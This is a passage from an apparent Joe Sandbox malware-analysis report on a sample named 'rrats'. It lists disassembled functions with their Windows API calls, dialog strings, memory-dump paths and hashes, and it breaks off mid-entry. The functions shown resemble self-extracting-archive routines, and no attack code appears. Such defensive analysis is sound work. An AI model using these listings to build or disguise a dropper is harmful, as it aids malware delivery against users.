                                                              • Instruction ID: e051b308fb5e1a2865cc015da1d5b982a2200ed9b979200e56e399f243c5705c
                                                              • Opcode Fuzzy Hash: 3217e3f9a2751000a8428d5b113db9a81d066e2a2f803916e73fb2b612483405
                                                              • Instruction Fuzzy Hash: 4A11A132900219B6DF219EA59D49FFF3B6CEB1A710F000021FA45F6194C7E4AE4597B2
                                                              Function 00CBDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: f614d5e8d3ea2c83310fc129119a04e29f673bb04d801767cc1925a0c2bd7641
                                                              • Instruction ID: 652e798d309e0114abc1cbce5fdfac8c3427ad916123424a2d645cfd8cfb6078
                                                              • Opcode Fuzzy Hash: f614d5e8d3ea2c83310fc129119a04e29f673bb04d801767cc1925a0c2bd7641
                                                              • Instruction Fuzzy Hash: ED01B176604285AFDB118FA5FC84BEE7BA8F708344F000426F94AC72B0E6309954EBB0
                                                              Function 00CC9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                              • Instruction ID: 3ddc79173d923570fd32f8bc8c14c8ed3518477e9611317a73fea3d610c3c7d2
                                                              • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                              • Instruction Fuzzy Hash: D6A16A729007869FEB21CF28C895FAEBBE5EF51310F2841ADE4969B281C634DE41C751
                                                              Function 00CAA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CA7F69,?,?,?), ref: 00CAA3FA
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CA7F69,?), ref: 00CAA43E
                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?), ref: 00CAA4BF
                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CAA4C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              • Opcode ID: bace8473ae94c089d4813395f167cd689db05f07404f87ade9b682ae54c19f0a
                                                              • Instruction ID: 349edb6052ebd4d0dd0aa31a505e8a536f7fb0e840387caed429cb4a93507273
                                                              • Opcode Fuzzy Hash: bace8473ae94c089d4813395f167cd689db05f07404f87ade9b682ae54c19f0a
                                                              • Instruction Fuzzy Hash: D641BE312483829AD731DF24DC55BEEBBE4AB86708F044919F5E193190D7A4EB48DB53
                                                              Function 00CA1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID:
                                                              • API String ID: 176396367-0
                                                              • Opcode ID: 4cc1e7bc8c164af0b1b850ec39ce8d053e31a057553ba7d16ce7a4d172abeab0
                                                              • Instruction ID: e6e9339e5ef908823efbe2301ab14b33c31b6b0292d7379b13629297f1f66f90
                                                              • Opcode Fuzzy Hash: 4cc1e7bc8c164af0b1b850ec39ce8d053e31a057553ba7d16ce7a4d172abeab0
                                                              • Instruction Fuzzy Hash: 874191B190166A9BCB259F68CC4AAEF7BBCEF01310F04412DFD45F7245DA30AE558BA4
                                                              Function 00CCC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00CC47C6,00000000,00000000,00CC57FB,?,00CC57FB,?,00000001,00CC47C6,2DE85006,00000001,00CC57FB,00CC57FB), ref: 00CCC9D5
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CCCA5E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CCCA70
                                                              • __freea.LIBCMT ref: 00CCCA79
                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 05bfaa3c587a2f1956aac6348e8c8ebb939b801d88d3f1d750db98fe0980bef6
                                                              • Instruction ID: 3239e2e265ef38366ee5f83e23f95c747b8faab11ce68b76d6c535ac439fe31f
                                                              • Opcode Fuzzy Hash: 05bfaa3c587a2f1956aac6348e8c8ebb939b801d88d3f1d750db98fe0980bef6
                                                              • Instruction Fuzzy Hash: 3431AE72A0021AABDF25DF65CC95EAE7BA5EB01310F04412DFC18E6250E735DE51EB90
                                                              Function 00CBA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00CBA666
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CBA675
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CBA683
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00CBA691
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: c12ea386b1e01fdf0297a1fe8422dfdef6d2d27461a53b8a4500113eebcb19b0
                                                              • Instruction ID: 316bd8c15f707d4b20bf655313e5955d14e36be3890575d50a8861fb2c515eb7
                                                              • Opcode Fuzzy Hash: c12ea386b1e01fdf0297a1fe8422dfdef6d2d27461a53b8a4500113eebcb19b0
                                                              • Instruction Fuzzy Hash: 66E0EC71943721ABD2615F61AC5DB8B3E58EB05B52F014501FB0DDA2D0DB6486048BB1
                                                              Function 00CBA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CBA699: GetDC.USER32(00000000), ref: 00CBA69D
                                                                • Part of subcall function 00CBA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CBA6A8
                                                                • Part of subcall function 00CBA699: ReleaseDC.USER32(00000000,00000000), ref: 00CBA6B3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00CBA83C
                                                                • Part of subcall function 00CBAAC9: GetDC.USER32(00000000), ref: 00CBAAD2
                                                                • Part of subcall function 00CBAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CBAB01
                                                                • Part of subcall function 00CBAAC9: ReleaseDC.USER32(00000000,?), ref: 00CBAB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: (
                                                              • API String ID: 1061551593-3887548279
                                                              • Opcode ID: ff3c42af5c05f546096d9e7c92fa3e4862dac8d3885f6a4489b5b26185f4a123
                                                              • Instruction ID: 24283c795ebf55ba311687a479f2e4238c5e0338bb1ba2ea799c88d1ce6d3c80
                                                              • Opcode Fuzzy Hash: ff3c42af5c05f546096d9e7c92fa3e4862dac8d3885f6a4489b5b26185f4a123
                                                              • Instruction Fuzzy Hash: E491DFB1608354AFD610DF25D848A6BBBE8FFC9701F00491EF59AD3261DB31A945CF62
                                                              Function 00CCB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00CCB324
                                                                • Part of subcall function 00CC9097: IsProcessorFeaturePresent.KERNEL32(00000017,00CC9086,00000000,00CC8D94,00000000,00000000,00000000,00000016,?,?,00CC9093,00000000,00000000,00000000,00000000,00000000), ref: 00CC9099
                                                                • Part of subcall function 00CC9097: GetCurrentProcess.KERNEL32(C0000417,00CC8D94,00000000,?,00000003,00CC9868), ref: 00CC90BB
                                                                • Part of subcall function 00CC9097: TerminateProcess.KERNEL32(00000000,?,00000003,00CC9868), ref: 00CC90C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                              • Instruction ID: 81c9045d908c77bb187d31bcd0056ce1bacbba04f1ddff6dc894f9df375c15be
                                                              • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                              • Instruction Fuzzy Hash: 7F517F71E0010AAFDF14DFA8C882EADBBB5EF58310F25816DE854E7351EB319E019B50
                                                              Function 00CA75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA75E3
                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                • Part of subcall function 00CAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA777F
                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                              • String ID: :
                                                              • API String ID: 3226429890-336475711
                                                              • Opcode ID: e32617a30bd0f8192b37a8558b60ac68edb3e78302be050a7b868eb510d78660
                                                              • Instruction ID: 600ff1adc45023a5dfd324b8f9262b60fbe0551cf3a945d4ef0b0dd8c3312593
                                                              • Opcode Fuzzy Hash: e32617a30bd0f8192b37a8558b60ac68edb3e78302be050a7b868eb510d78660
                                                              • Instruction Fuzzy Hash: 364160B1801159AAEF25EB64CC5AEEEB37CEF56304F004196B609A2092DB745F88DF61
                                                              Function 00CBB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: }
                                                              • API String ID: 176396367-4239843852
                                                              • Opcode ID: f2f01826acc8fa5eba0398b833c9e90aafa8da3ff4c9c4cd261b4d8777d3673e
                                                              • Instruction ID: e284b9ec8fd151cfe9087dbd3e340fd29608394d1ba10e8e57ce9083df59d509
                                                              • Opcode Fuzzy Hash: f2f01826acc8fa5eba0398b833c9e90aafa8da3ff4c9c4cd261b4d8777d3673e
                                                              • Instruction Fuzzy Hash: 3D21F07290435A5AD731EA64D845FABB3ECEF91750F04042EF640C3242EBA4DE4C93A3
                                                              Function 00CBDDA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(0001046A), ref: 00CBDDDC
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001046A,00CBB270,?,?), ref: 00CBDE18
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DialogParamVisibleWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 3157717868-3292211884
                                                              • Opcode ID: 09c2c1d4ad5c7305809f6b205369e36697ddb82b62986ae29cce4a3e2646dcfa
                                                              • Instruction ID: 2dc1dce9721d87249f8b4bf66c96193d66b94a5bedc3318fa95f53f4cfce0a9b
                                                              • Opcode Fuzzy Hash: 09c2c1d4ad5c7305809f6b205369e36697ddb82b62986ae29cce4a3e2646dcfa
                                                              • Instruction Fuzzy Hash: 261108726002C4AAEF11DE34AC41BEF3798AB06751F144075BE4AAB1C1D7B4AD55D760
                                                              Function 00CAF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CAF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
                                                                • Part of subcall function 00CAF2C5: GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00CAF33E), ref: 00CAF3D2
                                                              Strings
                                                              • CryptProtectMemory failed, xrefs: 00CAF389
                                                              • CryptUnprotectMemory failed, xrefs: 00CAF3CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: 085d4ca24c61d0c93448c9ec79a5d0f2ce9f854179b7c3529a7438f4b031aaeb
                                                              • Instruction ID: b225660c708de47529ba057c39db3f000569399bcb109c329eef401d28b32241
                                                              • Opcode Fuzzy Hash: 085d4ca24c61d0c93448c9ec79a5d0f2ce9f854179b7c3529a7438f4b031aaeb
                                                              • Instruction Fuzzy Hash: 7D112631A0226AABEF15AF71DD45B6E3754FF02768B04812EFC156F2A1DA309E038791
                                                              Function 00CAB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00CAB9B8
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 1543624204-3142399695
                                                              • Opcode ID: 9faff98e9ea3e0e6e9f6a24fd5cd25f92240ab0bc22b1ea639fc1c1e3609c905
                                                              • Instruction ID: 1fbf53ea4dd70cb0478871ede05e597c26ddc8b9dec8c1a7ef5c8afbc93e3ac8
                                                              • Opcode Fuzzy Hash: 9faff98e9ea3e0e6e9f6a24fd5cd25f92240ab0bc22b1ea639fc1c1e3609c905
                                                              • Instruction Fuzzy Hash: E701F563504313799A306B75DC42E6BABACEE93774B40841EF558D6083EB30DD40A3B1
                                                              Function 00CA1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CAE2E8: _swprintf.LIBCMT ref: 00CAE30E
                                                                • Part of subcall function 00CAE2E8: _strlen.LIBCMT ref: 00CAE32F
                                                                • Part of subcall function 00CAE2E8: SetDlgItemTextW.USER32(?,00CDE274,?), ref: 00CAE38F
                                                                • Part of subcall function 00CAE2E8: GetWindowRect.USER32(?,?), ref: 00CAE3C9
                                                                • Part of subcall function 00CAE2E8: GetClientRect.USER32(?,?), ref: 00CAE3D5
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                              • SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: 0
                                                              • API String ID: 2622349952-4108050209
                                                              • Opcode ID: 3e1aba4d05410b4437c42b18dbd62cc70656af143f4607e6f6e5e83c38389788
                                                              • Instruction ID: ea258e81fdba878a2032b38d35a79bcf717d0e7cfc844d4da8758ec16181c7a5
                                                              • Opcode Fuzzy Hash: 3e1aba4d05410b4437c42b18dbd62cc70656af143f4607e6f6e5e83c38389788
                                                              • Instruction Fuzzy Hash: 07F0447010638AA6DF151F518C0D7E93B59AF46348F0C4214FD58955B1DB74CB90EA50
                                                              Function 00CB0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00CB1101,?,?,00CB117F,?,?,?,?,?,00CB1169), ref: 00CB0FEA
